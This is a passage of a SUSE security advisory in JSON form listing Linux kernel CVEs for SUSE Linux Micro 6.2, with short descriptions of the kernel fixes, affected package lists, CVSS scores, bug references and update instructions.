"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n\u0027inflight\u0027 variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests 